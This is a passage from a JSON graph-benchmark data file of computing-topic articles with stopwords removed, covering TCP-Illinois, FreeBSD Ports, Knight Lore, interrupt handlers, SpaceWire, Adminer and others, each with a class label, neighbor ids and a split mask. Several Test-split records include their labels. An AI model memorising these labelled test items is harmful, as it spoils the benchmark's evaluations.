      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8110,
      8114,
      7603,
      8627,
      8631,
      1464,
      1978,
      8643,
      5062,
      7126,
      2519,
      4058,
      5596,
      2015,
      4064,
      1509,
      9189,
      5614,
      7663,
      1010,
      11256,
      2555,
      2045,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 5817,
    "label": 5,
    "text": "TCP-Illinois:tcp-illinois tcp-illinois variant tcp congestion control protocol developed university illinois urbana–champaign especially targeted high-speed long-distance networks sender side modification standard tcp congestion control algorithm achieves higher average throughput standard tcp allocates network resource fairly standard tcp compatible standard tcp provides incentives tcp users switch tcp-illinois loss-delay based algorithm uses packet loss primary congestion signal determine direction window size change uses queuing delay secondary congestion signal adjust pace window size change similarly standard tcp tcp-illinois increases window size w formula_1 acknowledgment decreases formula_2 formula_3 loss event unlike standard tcp formula_4 formula_5 constants instead functions average queuing delay formula_6 formula_7 formula_8 decreasing formula_9 increasing numerous choices formula_8 formula_9 one class formula_12 formula_13 let formula_8 formula_9 continuous functions thus formula_16 formula_17 formula_18 suppose formula_19 maximum average queuing delay denote formula_20 also formula_21 conditions formula_22 specific choice demonstrated figure 1 tcp-illinois increases throughput much quickly tcp congestion far increases throughput slowly congestion imminent result window curve concave average throughput achieved much larger standard tcp see figure 2 also many desirable features like fairness compatibility standard tcp providing incentive tcp users switch robust inaccurate delay measurement",
    "neighbors": [
      7017,
      10124,
      10924,
      2934,
      9021,
      10653,
      2079
    ],
    "mask": "Test"
  },
  {
    "node_id": 5818,
    "label": 4,
    "text": "Delphish:delphish delphish software product protects user data free anti-phishing extension microsoft outlook outlook express integrated toolbar delphish enables user check suspicious e-mails author country origin detects hidden links informs user origin operator linked web sites analyzes entire e-mail delphish created developed team made better-known safersurf another piece computer security software nutzwerk internet technologies software company headquartered leipzig delphish provides various features delphish released 2007 positive reviews ghacks said use delphish first layer defense phishing make sure able analyze mails well computerwoche wrote although delphish all-inclusive package anti-phishing protection turns useful informative tool seccity commented user estimate danger link since obtains detailed information link actual target type popularity age domain owners etc online pc said delphish provides advantages automatic recognition raises user awareness safe responsible use e-mails",
    "neighbors": [
      7012,
      8204,
      6797,
      7983,
      3643
    ],
    "mask": "None"
  },
  {
    "node_id": 5819,
    "label": 2,
    "text": "FreeBSD_Ports:freebsd ports freebsd ports collection package management system freebsd operating system providing easy consistent way installing software packages april 2018 31,679 ports available collection also adopted netbsd basis pkgsrc system ports collection uses makefiles arranged directory hierarchy software built installed uninstalled make command installing application little user intervention required issuing beginning command make install make install clean ports directory desired application cases software automatically downloaded internet patched configured necessary compiled installed registered package database new port needed dependencies applications libraries installed beforehand automatically ports already configured default options deemed generally appropriate users however configuration options called knobs sometimes changed installation using make config command brings text-based interface allows user select desired options historically port software package maintained individual port maintainer responsible ensuring currency port providing general support today many ports maintained special task forces sub-projects dedicated mailing list e.g kde freebsd.org java freebsd.org etc unmaintained ports assigned generic group ports freebsd.org general anyone may become port maintainer contributing favorite software collection one may also choose maintain existing port active maintainer precompiled binary ports called packages package created corresponding port make package command prebuilt packages also available download freebsd-hosted package repositories user install package passing package name pkg install command downloads appropriate package installed freebsd release version installs application including software dependencies may default packages downloaded main freebsd package repository pkg.freebsd.org freebsd maintains build farm called pointyhat cluster packages supported architectures major releases built build logs known errors ports built packages pointyhat cluster available database weekly builds logs also available mailing list archives precompiled packages separated categories architectures available packages separated several release directories one current production release built ports collection shipped release production release directories never updated also stable current directories several major release branches updated less weekly cases package created older version freebsd installed used newer system without difficulty since binary backward compatibility across major releases enabled default packaging system binary packages called codice_1 replaced package management system freebsd 10 jordan hubbard committed port make macros freebsd cvs repository august 21 1994 package install suite makefile committed year earlier august 26 1993 core ports framework first maintained hubbard along satoshi asami several years ports management team later formed handle task netbsd pkgsrc openbsd ports collection trace roots freebsd since release 3.6 dragonfly bsd project uses freebsd ports base dports ports collection john marino dragonfly bsd project created deltaports repository – collection patches files overlay modify freebsd ports order generate dports",
    "neighbors": [
      10760,
      10761,
      8213,
      6680,
      4636,
      9245,
      5155,
      5670,
      7722,
      5677,
      1071,
      9784,
      5177,
      10817,
      8266,
      8778,
      5710,
      7249,
      3667,
      6227,
      9306,
      607,
      9324,
      8816,
      1138,
      9844,
      2168,
      7293,
      9343,
      129,
      2180,
      6797,
      10900,
      10394,
      2212,
      4775,
      684,
      6828,
      3248,
      7859,
      1718,
      190,
      11459,
      9927,
      8395,
      9932,
      8909,
      4302,
      6864,
      2259,
      4309,
      6358,
      10455,
      6361,
      8410,
      8413,
      741,
      231,
      2281,
      11506,
      6393,
      1273,
      7425,
      11525,
      1801,
      7435,
      7947,
      9487,
      274,
      788,
      1813,
      5397,
      8476,
      6438,
      10535,
      4908,
      6446,
      7983,
      9009,
      1842,
      11573,
      823,
      2872,
      3918,
      850,
      2387,
      2901,
      4951,
      6491,
      348,
      9564,
      2401,
      7521,
      1379,
      1891,
      9063,
      8554,
      10096,
      7027,
      2421,
      2424,
      8068,
      3462,
      1927,
      8582,
      2955,
      9625,
      1946,
      1952,
      9125,
      11698,
      6583,
      1465,
      10172,
      3006,
      9151,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      11221,
      2010,
      3551,
      7140,
      998,
      6119,
      5096,
      4073,
      5612,
      2545,
      1522,
      3058,
      9201,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5820,
    "label": 3,
    "text": "Knight_Lore:knight lore knight lore 1984 action-adventure game known popularising isometric graphics video games game developed published ultimate play game written company founders chris tim stamper knight lore player character sabreman forty days collect objects throughout castle brew cure werewolf curse castle room depicted monochrome screen consists blocks climb obstacles avoid puzzles solve ultimate released knight lore third sabreman series despite completed first stamper brothers withheld release year position company advantageously anticipation game effect market knight lore novel image masking technique filmation let images appear pass atop behind without contents colliding created illusion depth priority computer natively support delaying knight lore release ultimate protected sales then-upcoming sabre wulf created another filmation game developers could copy style ultimate released original sabreman trilogy quick succession 1984 zx spectrum knight lore came last november ports followed bbc micro amstrad cpc msx family computer disk system 2008 unofficially ported atari 8-bit computers based bbc micro version game later included compilations including rare 2015 xbox one retrospective compilation rare replay knight lore regarded seminal work british gaming history included multiple lists top spectrum games critics considered technical solutions isometric 3d style harbinger future game design praised game controls atmosphere mystery noted difficult gameplay criticised sound occasional graphical slowdown knight lore best-selling game january 1985 named 1984 game year golden joystick awards popular computing weekly readers though first isometric 3d video game knight lore popularised format isometric flip-screen style fell fashion knight lore influence persisted computer role-playing games retrospective reviewers remember game first offer exploratory world rather flat surface consider controls outdated frustrating thirty years since release player sabreman bitten sabre wulf transforms werewolf nightfall 40 days collect items throughout melkhior wizard castle brew cure curse onscreen timer shows progression day night sabreman metamorphoses werewolf returning human form sunrise castle monsters attack sabreman werewolf game ends player completes potion finish task forty days game directions given poem included game cassette tape castle consists series 128 rooms displayed single non-scrolling screen sabreman must navigate 3d maze stone blocks room usually retrieve collectible object whilst avoiding spikes enemies kill contact player starts five lives loses one death running lives ends game stone blocks serve platforms player jump fall player weight move accord pushed enemies sabreman sabreman jumps higher werewolf form helps specific puzzles player often needs move blocks reach distant objects used platforms reach areas puzzles complete game player must return 14 sequential objects throughout castle wizard cauldron room end game player receives final score based remaining time amount quest completed ultimate play game represented co-founding brothers tim chris stamper uncommonly taciturn matters press marketing though provided details knight lore development crash magazine knight lore released third game sabreman series stamper brothers finished first withheld game year market reasons thought knight lore advancements—copyrighted filmation engine—would hurt sales then-upcoming sabre wulf used extra time prepare another filmation game alien 8 preempt sales would lost publishers would try copy technique sit everyone else far behind tim stamper recalled sabre wulf released commercial critical success 1984 alien 8 next two sabreman titles— underwurlde knight lore —followed close succession end year filmation knight lore graphical novelty lay images could render without overlapping filmation introduced masked sprites whereas earlier games used planar sprites overlapped without regard depth order chris stamper solution use image masking mask version image defines background subject matter different colours combining mask on-screen composite image mask background data ignored hole shape desired image sprite added background filled sprite details thus rooms knight lore drawn one sprite time masking method recent times contemporary images render layer priority set individual pixel level knight lore depicted monochrome changes rooms avoid attribute clash computing limitation wherein object colour interfered others close proximity ultimate released knight lore zx spectrum november 1984 press release announced game beginning new class adventure games pinnacle software development 48k spectrum standard cryptic company ultimate circulate screenshots game press materials cover art knight lore subsequently released bbc micro amstrad cpc msx later 1985 amstrad version upgraded monochromatic colouring two-colour foreground setup jaleco released versions knight lore msx later famicom disk system latter 1986 release barely resembled namesake ultimate asked shahid ahmad developed knight lore -inspired chimera 1985 develop knight lore port commodore 64 come fruition knight lore later appeared spectrum version 1986 compilation sold million ii 2015 xbox one compilation 30 ultimate rare titles rare replay computer game magazines lauded knight lore writing graphics first kind marked sea change contemporaries computer video games cvg wrote never seen graphics calibre lived ultimate hype peter sweasey home computing weekly left speechless predicted knight lore would change market crash said unlikely surpassed spectrum best game crash selected knight lore crash smash recommendation january 1985 issue knight lore best selling game united kingdom month popular computing weekly readers named knight lore 1984 arcade game overall game year knight lore also named cvg game year 1985 golden joystick awards event ultimate named developer programmer year knight lore atmosphere sinclair user described crepuscular world claustrophobic menace inspired many curious questions part adventurer contemporaneous 1985 reviews crash appreciated imaginative mystery game attempted answer sabreman turns werewolf preferred play collectible objects throughout castle sabreman werewolf transformation sequence particular annoyed cvg traumatised players according well played book academic close readings video games players empathised suffering sabreman game design gave impression castle far grander scale reality crash wrote game novel eight-way direction scheme suited 3d space crash compared knight lore stylistically 1984 avalon suggested former bolder visuals magazine preferred knight lore predecessor underwurlde one critic even considered former ultimate best game crash noted knight lore masking technique addressed issues flicker attribute clash sinclair user appreciated sabreman disappeared view passing behind blocks criticism reviewers considered knight lore sound weakest component though spectrum clash also identified sometimes cruel difficulty gameplay later rooms castle require pixel-perfect precision compounded anxiety running timer game animations would slow proportional degree onscreen action reviews amstrad release amtix noted colour additions monochromatic original wrote knight lore among amstrad best adventures one complaint graphical slowdown many elements moving onscreen amstrad action shared complaint nevertheless named knight lore among amstrad best three games—an improvement spectrum release par quality commodore 64 titles knight lore widely regarded seminal work british gaming history according kieron gillen rock paper shotgun knight lore second elite 1984 icon 1980s british computer game industry british magazine retro gamer described players first impressions knight lore unforgettable par experience playing space harrier 1985 wolfenstein 3d 1992 super mario 64 1996 first time retro gamer recalled knight lore striking isometric 3d visuals bold advance game graphics foretelling future british magazine edge described game graphics engine single greatest advance history video games retro gamer compared engine impact introduction sound film knight lore first use isometric graphics—earlier examples include zaxxon 1982 q*bert 1982 ant attack 1983 —but graphic style large in-game world popularised technique put ultimate filmation epicentre several video game clones inspired knight lore edge games struggled approximate isometric style internally visiting developer bo jangeborg devised solution result fairlight 1985 regarded another classic platform edge version filmation received branding worldmaker shahid ahmad said firebird chimera 1985 even closer knight lore ahmad shock admiration playing knight lore reportedly changed life convinced continue making games released chimera amstrad cpc atari 8-bit commodore 64 zx spectrum customising port processing limitations hardware 1986 many british video game publishers produced knight lore -style isometric games examples include sweevo world movie quazatron get dexter glider rider molecule man spindizzy bobby bearing many titles suffered slowdown issues knight lore due much on-screen activity ultimate released four filmation games alien 8 1985 rushed release developers opportunity react knight lore though retro gamer said rush noticeable alien 8 larger game world knight lore even puzzles alien 8 knight lore similar gameplay former set outer space updated filmation ii engine nightshade 1985 added colour scrolling graphics place flip-screen room changes however retro gamer regarded gameplay comparatively dull gunfright 1986 reported stampers last game also used filmation ii robust predecessor pentagram 1986 returned flip-screen rooms action-based gameplay included shooting enemies sold poorly last sabreman game meanwhile stamper brothers sought enter burgeoning console industry sold ultimate u.s. gold mid-1980s established rare develop nintendo console games ultimate last two isometric games lesser quality consumer interest genre endured isometric flip-screen trend continued britain several years apart fairlight sweevo world get dexter isometric flip-screen games included jon ritman knight lore -inspired batman 1986 head heels 1987 last ninja 1987 la abadía del crimen 1987 cadaver 1990 console games solstice 1990 landstalker 1992 players grew tired genre similar reiterations ritman games particular brought new ideas sandy white developed pre- knight lore isometric game ant attack impressed ultimate in-game balance gutsy design decisions developer great escape another isometric game considered knight lore rival title inspiration still spurred spend nine months making time stood still retro gamer wrote knight lore influence persisted 30 years later titles populous 1989 syndicate 1993 1994 civilization ii 1996 style also spread computer role-playing games like baldur gate diablo fallout though gamesradar matt cundy reported 2009 isometric perspective longer prominent topic game design 2014 chris scullion vice traced knight lore isometric influence sims 4 2014 diablo iii 2012 knight lore included multiple lists top spectrum games even top games platform inspired two fangames 1999 sequel 2010 3d remake development four years though isometric games existed previously retrospective review gillen rock paper shotgun recalled knight lore first game offer world physical depth exploration opposed simple mechanics arcade games jeremy signor usgamer agreed knight lore felt like world painting added game innovative use successive single-screen rooms flip-screen pre-dated legend zelda years gillen said game punishing style unforgiving gameplay high difficulty awkward controls become obsolete 30 years since release criticised knight lore enormously innovative incredibly atmospheric totally unplayable suggesting similar head heels 1987 aged much better peter parrish eurogamer found game frustrating though well-made dan whitehead publication appreciated 2015 rare replay compilation version knight lore emulated original choppy animations zx spectrum processor struggled render onscreen objects",
    "neighbors": [
      3074,
      4102,
      4758,
      9254,
      9006,
      10931,
      4278,
      320,
      4418,
      1226,
      3029,
      983,
      5340,
      9191,
      2792,
      3307,
      8300,
      7283,
      6390,
      2173,
      8830
    ],
    "mask": "Test"
  },
  {
    "node_id": 5821,
    "label": 3,
    "text": "Compaq_Presario_1200:compaq presario 1200 compaq presario 1200 series line notebook computers produced 1998 2000 compaq originally noted amd processors light weight 12-inch lcd screens later models included shift intel processors changed features label compaq presario 1200 includes vast set model numbers revisions many totally compatible even though machines share general presario model number many original models presario 1200 series ran amd k6-2 processors quite adventurous move time amd much second place dominant market leader intel chips notable inclusion 3d-now technology enabling marked performance increases original k6 chips came variety speeds ranging 333 mhz 550 mhz however performance varied slightly models number presario 1200 series notebooks exist celeron pentium iii processors well primarily found later designs later models often noted silver display lid instead original black lid range came toshiba hdds optical media drives available 24x cd-roms 4x dvd-roms hard drives ranged 3.01 gb 10.0 gb ran slow 3300 rpm across range could due noise limitations series noted low noise output screens available 12.1 13.0 inch lcds yet screen housing varied model model 1245 1246 different screen housing 1200 1200xl came 13 inch screen 1200 also silver housing whereas models came black screens series notable banding white edges appear evident machine ages backlight sides clearly visible memory expansion available bottom units allowing 128mb additional sodimm memory added models came equipped floppy disk drive vga output pc card slot standard also came on-board jbl stereo speakers synaptics touchpads systems preinstalled windows 98 windows windows 2000 professional supplied quick restore disc returned system factory condition event change ownership wish reinstall os system failure priced £1200 1200 contained 500 mhz amd k6-2 processor lithium ion battery originally priced 1,699 1200-xl125 designated model number 12xl125 1200-xl300 designated model number 12xl325 one newer models 1200 series features 1246 generally mirrored 1200-xl325 notable differences change intel processor architecture physical differences include silver lid different display hinge configuration slightly rearranged motherboard layout changes render generation presario 1200 distinctly incompatible component level predecessors major differences hardware 1200-xl325 1200-xl405a designated model number 12xl405a another model using intel processor similar layout xl325 motherboard equipped socket-370 zif cpu socket uses via ple133 chipset comprising vt8601 north bridge vt82c686a south bridge graphics provided via trident cyberblade-i1 controller integrated vt8601 circuitry although similar hardware xl405a xl502a model number 12xl502a upgraded model based brother notorious inclusion minipci slot bottom presence slightly faster processor color case silver lid maintained rest case all-black firsts units model originally came ni-mh battery pack later ones came dependable li-ion one types available purchase obviously fitted 1200-series one interesting thing specific model support pentium iii processors 1ghz coppermine cores expense massive heat battery power draw increase 1200-xl302 model number 12xl302 equipped similar xl502a difference celeron processor 600 mhz askey modem minipci slot compaq presario 1230 manufactured 1998 mmx intel processor known 3d sound speakers priced rrp £1000 1245 came equipped next model 1245 1246 offered new processor bigger hdd cf card slot fold-down feet desktop operation aesthetically 1246 almost identical 1245 screens cases highly similar many components interchangeable 1245 lcd inverters processors housing addition aforementioned 1245 spec 1246 offered almost technically identical 1245 1260 borrowed 333 mhz amd k6-2 processor 64mb ram ati rage ii graphics chip compaq presario 1200 laptops often found damaged power jacks power jacks appear blown half due sort short others rip copper traces motherboard due stress placed power jack presario 1200 laptops typically four tiny copper rings embedded motherboard behind power jack used reattach slightly damaged power jack repair failing unit lcd power inverter cable runs hinge base screen susceptible damage given strain bending closing lid cable 6-strand ribbon variety therefore soldering impossible",
    "neighbors": [
      6765,
      6151
    ],
    "mask": "None"
  },
  {
    "node_id": 5822,
    "label": 2,
    "text": "Lguest:lguest lguest linux kernel x86 virtualization hypervisor introduced kernel version 2.6.23 released 9 october 2007 removed kernel version 4.14 november 2017 hypervisor operating-system-level virtualization system capable running unmodified 32-bit x86 linux kernels guest machines installation easy running modprobe lg followed tools/lguest/lguest create new guest lguest still installed kernel 4.14 later out-of-tree patches lguest maintained rusty russell",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      4695,
      10851,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 5823,
    "label": 3,
    "text": "Interrupt_handler:interrupt handler computer systems programming interrupt handler also known interrupt service routine isr special block code associated specific interrupt condition interrupt handlers initiated hardware interrupts software interrupt instructions software exceptions used implementing device drivers transitions protected modes operation system calls traditional form interrupt handler hardware interrupt handler hardware interrupts arise electrical conditions low-level protocols implemented digital logic usually dispatched via hard-coded table interrupt vectors asynchronously normal execution stream interrupt masking levels permit often using separate stack automatically entering different execution context privilege level duration interrupt handler execution general hardware interrupts handlers used handle high-priority conditions require interruption current code processor executing later found convenient software able trigger mechanism means software interrupt form synchronous interrupt rather using hard-coded interrupt dispatch table hardware level software interrupts often implemented operating system level form callback function interrupt handlers multitude functions vary based triggered interrupt speed interrupt handler completes task example pressing key computer keyboard moving mouse triggers interrupts call interrupt handlers read key mouse position copy associated information computer memory interrupt handler low-level counterpart event handlers however interrupt handlers unusual execution context many harsh constraints time space intrinsically asynchronous nature makes notoriously difficult debug standard practice reproducible test cases generally n't exist thus demanding specialized skillset—an important subset system programming—of software engineers engage hardware interrupt layer unlike event handlers interrupt handlers expected set interrupt flags appropriate values part core functionality even cpu supports nested interrupts handler often reached interrupts globally masked cpu hardware operation architecture interrupt handler would normally save smallest amount context necessary reset global interrupt disable flag first opportunity permit higher priority interrupts interrupt current handler also important interrupt handler quell current interrupt source method often toggling flag bit kind peripheral register current interrupt n't immediately repeated handler exit resulting infinite loop exiting interrupt handler interrupt system exactly right state every eventuality sometimes arduous exacting task mishandling source many serious bugs kind halt system completely bugs sometimes intermittent mishandled edge case occurring weeks months continuous operation formal validation interrupt handlers tremendously difficult testing typically identifies frequent failure modes thus subtle intermittent bugs interrupt handlers often ship end customers modern operating system upon entry execution context hardware interrupt handler subtle reasons performance handler typically initiated memory execution context running process special connection interrupt essentially usurping running context—process time accounting often accrue time spent handling interrupts interrupted process however unlike interrupted process interrupt usually elevated hard-coded cpu mechanism privilege level high enough access hardware resources directly low-level microcontroller chip might lack protection modes memory management unit mmu chips execution context interrupt handler essentially interrupted program typically runs small stack fixed size memory resources traditionally extremely scant low end nested interrupts often provided exacerbates stack usage primary constraint interrupt handler programming endeavour exceed available stack worst-case condition requiring programmer reason globally stack space requirement every implemented interrupt handler application task allocated stack space exceeded condition known stack overflow normally detected hardware chips class stack exceeded another writable memory area handler typically work expected application fail later sometimes much later due handler side effect memory corruption stack exceeded non-writable protected memory area failure usually occur inside handler generally easier case later debug writable case one implement sentinel stack guard—a fixed value right beyond end legal stack whose value overwritten never system operates correctly common regularly observe corruption stack guard kind watch dog mechanism catch majority stack overflow conditions point time close offending operation multitasking system thread execution typically stack special system stack provided interrupts interrupts consume stack space whatever thread execution interrupted designs usually contain mmu user stacks usually configured stack overflow trapped mmu either system error debugging remap memory extend space available memory resources level microcontroller typically far less constrained stacks allocated generous safety margin systems supporting high thread counts better hardware interrupt mechanism switches stack special system stack none thread stacks need account worst-case nested interrupt usage tiny cpus far back 8-bit motorola 6809 1978 provided separate system user stack pointers many reasons highly desired interrupt handler execute briefly possible highly discouraged forbidden hardware interrupt invoke potentially blocking system calls system multiple execution cores considerations reentrancy also paramount system provides hardware dma concurrency issues arise even single cpu core uncommon mid-tier microcontroller lack protection levels mmu still provide dma engine many channels scenario many interrupts typically triggered dma engine associated interrupt handler expected tread carefully modern practice evolved divide hardware interrupt handlers front-half back-half elements front-half first level receives initial interrupt context running process minimal work restore hardware less urgent condition emptying full receive buffer marks back-half second level execution near future appropriate scheduling priority invoked back-half operates process context fewer restrictions completes handler logical operation conveying newly received data operating system data queue several operating systemslinux unix macos microsoft windows z/os desqview operating systems used pastinterrupt handlers divided two parts first-level interrupt handler flih second-level interrupt handlers slih flihs also known hard interrupt handlers fast interrupt handlers slihs also known slow/soft interrupt handlers deferred procedure calls windows flih implements minimum platform-specific interrupt handling similar interrupt routines response interrupt context switch code interrupt loaded executed job flih quickly service interrupt record platform-specific critical information available time interrupt schedule execution slih long-lived interrupt handling flihs cause jitter process execution flihs also mask interrupts reducing jitter important real-time operating systems since must maintain guarantee execution specific code complete within agreed amount time reduce jitter reduce potential losing data masked interrupts programmers attempt minimize execution time flih moving much possible slih speed modern computers flihs may implement device platform-dependent handling use slih platform-independent long-lived handling flihs service hardware typically mask associated interrupt keep masked case may complete execution unusual flih unmasks associated interrupt completes called reentrant interrupt handler reentrant interrupt handlers might cause stack overflow multiple preemptions interrupt vector usually avoided priority interrupt system flih also briefly masks interrupts equal lesser priority slih completes long interrupt processing tasks similarly process slihs either dedicated kernel thread handler executed pool kernel worker threads threads sit run queue operating system processor time available perform processing interrupt slihs may long-lived execution time thus typically scheduled similarly threads processes linux flihs called upper half slihs called lower half bottom half different naming used unix-like systems part bottom half",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      1058,
      9762,
      5158,
      3630,
      7217,
      9784,
      10809,
      576,
      7235,
      3157,
      602,
      10333,
      97,
      8298,
      7281,
      7285,
      9335,
      2168,
      1147,
      1660,
      3197,
      1150,
      2179,
      10883,
      6797,
      1170,
      659,
      6806,
      9366,
      1176,
      6296,
      7325,
      9887,
      4773,
      3248,
      6837,
      8388,
      5831,
      3272,
      9928,
      9932,
      5840,
      7382,
      8410,
      3294,
      5856,
      1253,
      5862,
      1776,
      5363,
      2811,
      10499,
      1804,
      273,
      11539,
      10016,
      10235,
      2345,
      11564,
      7983,
      823,
      4409,
      7483,
      11075,
      4423,
      9547,
      5457,
      11601,
      10590,
      8551,
      5492,
      389,
      394,
      3978,
      7057,
      9105,
      11667,
      5529,
      8092,
      9628,
      1444,
      421,
      9638,
      6063,
      11184,
      6075,
      6078,
      9151,
      10183,
      8136,
      9685,
      4569,
      477,
      2019,
      6118,
      6128,
      5619,
      6139
    ],
    "mask": "Test"
  },
  {
    "node_id": 5824,
    "label": 2,
    "text": "Access_Linux_Platform:access linux platform access linux platform alp discontinued open-source software based operating system referred next-generation version palm os mobile devices developed marketed access co. tokyo japan platform included execution environments java classic palm os gtk+-based native linux applications alp demonstrated devices variety conferences including 3gsm linuxworld guadec open source mobile alp first announced february 2006 initial versions platform software development kits officially released february 2007 coordinated effort access esteemo nec ntt docomo panasonic use platform basis shared platform implementing revised version i.mode mobile oriented applications platform moap l application programming interfaces apis conforming specifications limo foundation first smartphone use alp edelweiss emblaze mobile scheduled mid-2009 however shelved release first else renamed monolith smartphone developed sharp corporation cooperation emblaze mobile seven partners scheduled 2009 never released officially cancelled june 2010 result platform never launched independently devices longer referenced access website user interface designed similar general goals earlier palm os releases aim preserving zen palm design philosophy centered making applications simple possible aspects interface included task-based orientation rather file/document orientation commonly found desktop systems appearance platform intended highly customizable provide differentiation specific devices contexts last releases went much modern look gesture support longer close palm os similarly maemo nokia internet tablet framework alp based components drawn gnome project including gtk+ gstreamer frameworks variety core components drawn mainstream open source projects including bluez matchbox cramfs others components licensed gnu general public license gpl gnu lesser general public license lgpl open source licenses meaning alp free open environment software level several components alp released mozilla public license hiker project components addressed issues application life-cycle intertask communication exchange use structured data security time event-based notifications areas common development applications mobile devices alp presented standard apis common operations defined standards portable operating system interface posix linux standard base lsb however neither standard addresses telephony device customizing messaging several topics several frameworks apis defined access applications alp could developed linux-native code c c++ legacy palm os applications run garnet vm emulation environment java execution environments supported via development launchpad used application manager part hiker framework alp sdk used eclipse-based integrated development environment ide added plug-ins predecessor palm os development environment compilers used embedded application binary interface eabi enabled arm versions standard gnu compiler collection gcc tool chain alp used combination user-space policy-based security framework kernel-space linux security module implement fine-grained access controls components alp security implementation released part hiker framework controls based signatures certificates unsigned applications allowed access predefined set safe apis",
    "neighbors": [
      11271,
      3082,
      5139,
      10780,
      10785,
      6180,
      3626,
      5677,
      7727,
      8242,
      9266,
      6213,
      8268,
      7246,
      7253,
      3162,
      607,
      5222,
      10856,
      6763,
      8315,
      8316,
      8829,
      4734,
      11391,
      2179,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      6301,
      1694,
      2723,
      8355,
      3248,
      7857,
      10933,
      5815,
      2235,
      5822,
      9921,
      1736,
      2762,
      8909,
      4305,
      2259,
      8410,
      10971,
      8928,
      1761,
      2278,
      8423,
      233,
      8938,
      9964,
      10482,
      2294,
      8439,
      2809,
      4360,
      4364,
      792,
      4383,
      10016,
      295,
      1833,
      7983,
      823,
      6968,
      7992,
      318,
      7492,
      3911,
      6988,
      10063,
      5975,
      10080,
      10599,
      10091,
      2925,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      3542,
      2529,
      6625,
      8676,
      2021,
      10215,
      1513,
      495,
      3055,
      5105,
      1524,
      2036,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5825,
    "label": 3,
    "text": "SpaceWire:spacewire spacewire spacecraft communication network based part ieee 1355 standard communications coordinated european space agency esa collaboration international space agencies including nasa jaxa rka within spacewire network nodes connected low-cost low-latency full-duplex point-to-point serial links packet switching wormhole routing routers spacewire covers two physical data-link seven layers osi model communications spacewire modulation data formats generally follow data strobe encoding differential ended signaling ds-de part ieee std 1355-1995 spacewire utilizes asynchronous communication allows speeds 2 mbit/s 400 mbit/s initial signalling rate 10mbit/s ds-de well-favored describes modulation bit formats routing flow control error detection hardware little need software spacewire also low error rates deterministic system behavior relatively simple digital electronics spacewire replaced old pecl differential drivers physical layer ieee 1355 ds-de low-voltage differential signaling lvds spacewire also proposes use space-qualified 9-pin connectors spacewire ieee 1355 ds-de allows wider set speeds data transmission new features automatic failover fail-over features let data find alternate routes spacecraft multiple data buses made fault-tolerant spacewire also allows propagation time interrupts spacewire links eliminating need separate time discretes transferred character starts parity bit data-control flag bit data-control flag 0-bit 8-bit lsb character follows otherwise one control codes including end packet eop network data frames look follows one address bytes used routing addresses either physical ones 0-32 logical ones difference physical addresses deleted frame header routing used hop-based routing based path specified frame logical addresses may deleted well depending router configuration hardware devices may connected either directly via spacewire router former case usually pairs devices used guarantee fail-safe operation however handled software spacewire router usually crossbar switch-type device operating wormhole switching mode also may limit speed communication lowest common speed routing decisions based programmed routing table initial incoming frame contents spacewire used worldwide use began primarily esa projects currently used nasa jaxa rka many organizations companies nasa projects using include james webb space telescope swift burst alert telescope lunar reconnaissance orbiter lcross geostationary operational environmental satellite goes-r scan testbed previously known communications navigation networking reconfigurable testbed connect also selected united states department defense operationally responsive space spacewire initiatives coordinated several space agencies frame ccsds order extend communication model network transport layers osi model spacewire supports highly fault-tolerant networks systems one reason popularity esa draft specification place protocol id following protocol id assigned ecss-e-st-50-11 commercial providers spacewire equipment spacewire ip cores articles",
    "neighbors": [
      6659,
      10214,
      2503,
      10833,
      4918,
      7865,
      3450
    ],
    "mask": "Test"
  },
  {
    "node_id": 5826,
    "label": 9,
    "text": "DIANA_(intermediate_language):diana intermediate language diana descriptive intermediate attributed notation ada intermediate language used represent semantics ada program originally designed interface front end syntactic analysis middle semantic analysis compiler one hand back end code generation optimization also used internal representation language tools diana also used pl/sql based ada diana abstract data type concrete implementations defined using idl specification language diana descends tcol aida earlier representations ada programs ada-0 subset ada karlsruhe 1980 first using aida later aida got replaced diana full karlsruhe ada compilation system used diana well idl external representation marshalling middle-end code generating back-end",
    "neighbors": [
      428,
      8262,
      10703
    ],
    "mask": "Test"
  },
  {
    "node_id": 5827,
    "label": 1,
    "text": "Adminer:adminer adminer formerly known phpminadmin tool managing content mysql databases since version 2 also postgresql ms sql sqlite oracle databases adminer distributed apache license gpl v2 form single php file around 470 kib size author jakub vrána started develop tool light-weight alternative phpmyadmin july 2007 adminer got attention 2008 made cca finals sourceforge also first webhosting providers started include adminer mysql managing tool portfolio services 2012 adminer got coverage linux.com second time project priorities according author order safety user-friendliness performance functionality size small single file result compilation minification source codes",
    "neighbors": [
      11457,
      899,
      8644,
      10340,
      3462,
      4198,
      5546,
      10413,
      5198,
      7022,
      8539,
      2901,
      87,
      9177,
      5403,
      2780
    ],
    "mask": "Test"
  },
  {
    "node_id": 5828,
    "label": 3,
